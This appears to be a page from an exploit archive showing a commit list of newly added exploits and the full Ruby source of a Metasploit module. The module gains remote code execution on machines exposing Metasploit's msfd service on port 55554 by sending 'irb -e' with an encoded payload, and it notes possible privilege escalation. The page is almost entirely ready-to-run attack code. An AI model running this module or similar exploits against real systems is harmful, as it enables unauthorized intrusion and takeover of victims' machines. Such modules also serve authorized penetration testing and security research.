be89b7c04a
11 changes to exploits/shellcodes WebKit - 'WebCore::jsElementScrollHeightGetter' Use-After-Free LibreOffice/Open Office - '.odt' Information Disclosure Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH) ASUS infosvr - Auth Bypass Command Execution (Metasploit) ASUS infosvr - Authentication Bypass Command Execution (Metasploit) Drupal < 7.58 - 'Drupalgeddon3' Authenticated Remote Code (Metasploit) xdebug < 2.5.5 - Unauthenticated OS Command Execution (Metasploit) Metasploit Framework - 'msfd' Remote Code Execution (via Browser) (Metasploit) Metasploit Framework - 'msfd' Remote Code Execution (Metasploit) Exim < 4.90.1 - 'base64d' Remote Code Execution Drupal < 7.58 - 'Drupalgeddon3' Authenticated Remote Code (Metasploit) Cockpit CMS 0.4.4 < 0.5.5 - Server-Side Request Forgery
66 lines
No EOL
1.9 KiB
Ruby
Executable file
66 lines
No EOL
1.9 KiB
Ruby
Executable file
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Metasploit msfd Remote Code Execution',
|
|
'Description' => %q{
|
|
Metasploit's msfd-service makes it possible to get a msfconsole-like
|
|
interface over a TCP socket. If this socket is accessible on a remote
|
|
interface, an attacker can execute commands on the victim's machine.
|
|
|
|
If msfd is running with higher privileges than the current local user,
|
|
this module can also be used for privilege escalation. In that case,
|
|
port forwarding on the compromised host can be used.
|
|
|
|
Code execution is achieved with the msfconsole command: irb -e 'CODE'.
|
|
},
|
|
'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
|
|
'License' => BSD_LICENSE,
|
|
'Platform' => "ruby",
|
|
'Arch' => ARCH_RUBY,
|
|
'Payload' =>
|
|
{
|
|
'Space' => 8192, # Arbitrary limit
|
|
'BadChars' => "\x27\x0a",
|
|
'DisableNops' => true
|
|
},
|
|
'Targets' =>
|
|
[
|
|
[ 'Automatic', { } ]
|
|
],
|
|
'Privileged' => false,
|
|
'DisclosureDate' => 'Apr 11 2018', # Vendor notification
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(55554)
|
|
])
|
|
end
|
|
|
|
def check
|
|
connect
|
|
data = sock.get_once
|
|
if data.include?("msf")
|
|
disconnect
|
|
return Exploit::CheckCode::Appears
|
|
end
|
|
disconnect
|
|
return Exploit::CheckCode::Unknown
|
|
end
|
|
|
|
def exploit
|
|
connect
|
|
sock.get_once
|
|
sock.put "irb -e '" + payload.encoded + "'\n"
|
|
disconnect
|
|
end
|
|
end |